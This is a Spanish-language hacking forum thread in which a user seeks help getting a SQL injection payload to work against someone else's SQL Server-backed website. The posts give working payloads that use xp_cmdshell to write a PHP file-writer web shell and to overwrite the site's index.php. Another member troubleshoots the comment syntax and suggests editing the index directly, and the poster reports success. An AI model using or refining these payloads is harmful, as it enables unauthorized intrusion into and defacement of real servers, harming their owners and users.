Autor
|
Tema: pregunta v2 , sql server (Leído 3,517 veces)
|
PHAMTOM
Desconectado
Mensajes: 83
0x8B,0xEC,0x33,0xFF
|
hola
yo queria atravez de sql server , de una iyneccion en las bases de datos de una web que corre por sql server queria subirle un archivo ,pero , me pueden corregir el codigo,no lo sube y lo vi varias veces.
'';exec master..xp_cmdshell 'echo ^<? $d=fopen("index.php","w");$s=$_REQUEST["variable"];fputs($d,$s);fclose($d); ?^> > C:\AppServ\www\update.php'--
Queria subir el archivo update,con el siguiente codigo .
Gracias de antemano
el individuo usa appserver
|
|
« Última modificación: 19 Noviembre 2009, 22:46 pm por H-PHAMTOM »
|
En línea
|
Miran a cualquier ventana, mientras su pánico emana y nubla su visión mi calma es pura precisión cargo munición y miro tranquilo ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!
La kitchner quiere tanto a los pobres,que cada vez,tiene más
|
|
|
WHK
|
y para que quieres modificar el index.php desde update.php si puedes hacerlo directamente desde el exec que invocaste en la query?.
Si no te funciona talves tengan deshabilitada esa función o el directorio se encuentre a modo solo de lectura creado por un administrador, en ese caso no podrías sobreescribir archivos y por politicas de seguridad de win tampoco crear usuarios nt.
También recuerda que no es lo mismo "--" a decir " -- " ya que '-- no existe ni te lo va a reconocer el servidor sql, debes dejar un espacio en blanco antes y despues de las lineas de comentario.
|
|
|
En línea
|
|
|
|
PHAMTOM
Desconectado
Mensajes: 83
0x8B,0xEC,0x33,0xFF
|
Problema solucionado , gracias otra vez WHK.
|
|
|
En línea
|
Miran a cualquier ventana, mientras su pánico emana y nubla su visión mi calma es pura precisión cargo munición y miro tranquilo ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!
La kitchner quiere tanto a los pobres,que cada vez,tiene más
|
|
|
ChElAnO
Desconectado
Mensajes: 129
|
Problema solucionado , gracias otra vez WHK. como?
|
|
|
En línea
|
|
|
|
PHAMTOM
Desconectado
Mensajes: 83
0x8B,0xEC,0x33,0xFF
|
Claro, ahora estaba viendo de modificar el index.php, desde exec.
''exec master.xp_cmdshell 'echo hola ^> C:\AppServ\www\index.php' --
si el servidor acepta " exec " y el index.php se ubique en la ruta especificada , funcionaria?
C:\AppServ\www\index.php
|
|
|
En línea
|
Miran a cualquier ventana, mientras su pánico emana y nubla su visión mi calma es pura precisión cargo munición y miro tranquilo ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!
La kitchner quiere tanto a los pobres,que cada vez,tiene más
|
|
|
|
|
|